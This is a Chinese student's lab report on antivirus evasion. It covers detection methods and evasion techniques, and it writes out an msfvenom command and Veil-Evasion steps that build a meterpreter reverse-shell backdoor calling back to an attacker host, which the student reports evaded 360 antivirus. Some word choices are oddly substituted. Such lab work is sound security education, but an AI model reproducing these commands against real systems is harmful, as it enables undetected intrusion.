20155324《网络对抗》免杀原理与实践

20155324《网络对抗》免杀原理与实践

免杀原理

实验内容

（1）理解免杀技术原理

（2）正确使用msf编码器，veil-evasion，本身利用shellcode编程等免杀工具或技巧；

（3）经过组合应用各类技术实现恶意代码免杀

（4）用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

基础问题回答

（1）杀软是如何检测出恶意代码的？

• 正常行为分析法：正常行为分析常被应用于异常检测之中，是指对程序的正常行为轮廓进行分析和表示，为程序创建一个安全行为库，当被监测程序的实际行为与其安全行为库中的正常行为不一致或存在必定差别时，则可能为恶意代码
• 特征检测法：系统分析获取恶意代码一般具备明显特征码，当检测到代码含有特征码则可能为恶意代码

（2）免杀是作什么？

• 免杀是不会被杀毒软件软件杀掉的病毒或木马 是病毒的制做人 为了避免让病毒被识别出来 经过钻杀毒软件漏洞或者将病毒假装成正常程序的办法 来逃避杀毒软件的查杀

（3）免杀的基本方法有哪些？

• 修改特征码：对恶意代码的特征码进行修改，好比添加一些指令，让杀软没法识别其是否为恶意代码
• 加花：经过添加加花指令（一些垃圾指令，相似加1减1之类的无用语句）让杀毒软件检测不到特征码。加花能够分为加区加花和去头加花
• 加壳：给原程序加上一段保护程序，有保护和加密功能，运行加壳后的文件先运行壳再运行真实文件，从而起到保护做用

正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧

• 将文件传至virscan.org进行检测
  

有18个杀毒软件查出来了。扫描结果:46%的杀软(18/39)报告发现病毒

msf用编码器生成执行文件 编码一次

Kali输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5324端口号 -f exe >本身起后门名字.exe

再次

使用Veil-Evasion从新编写源代码

在Kali中安装veil，sudo apt-get install veil

• 在Kali的终端中启动Veil-Evasion
  命令行中输入veil，后在veil中输入命令use evasion
  依次输入以下命令生成你的可执行文件：

use python/meterpreter/rev_tcp.py（设置payload）

set LHOST Kali的IP（设置反弹链接IP）

set LPORT 端口号（设置反弹端口）

generate
可执行文件名

选择使用语言来编写

利用shellcode编程实现免杀

• 首先，在Kali上使用命令生成一个c语言格式的Shellcode数组。

• VS编译运行产生exe文件（exe文件名不能存在20155324这样的学号）

实测优化版本、回连成功

按照上次实验用过的msf监听方法在Kali上打开监听，在Win主机开启杀软（Win安装360 ）的状况下，运行最后生成的优化版exe文件，Kali成功获取了Win主机的权限

实验总结

经过本次实验让我进一步了解了病毒的可怕，居然都能经过360的检查，真是太恐怖了。仍是本身作的颇有成就感！但愿在之后的学习中可以更多的学到这些知识。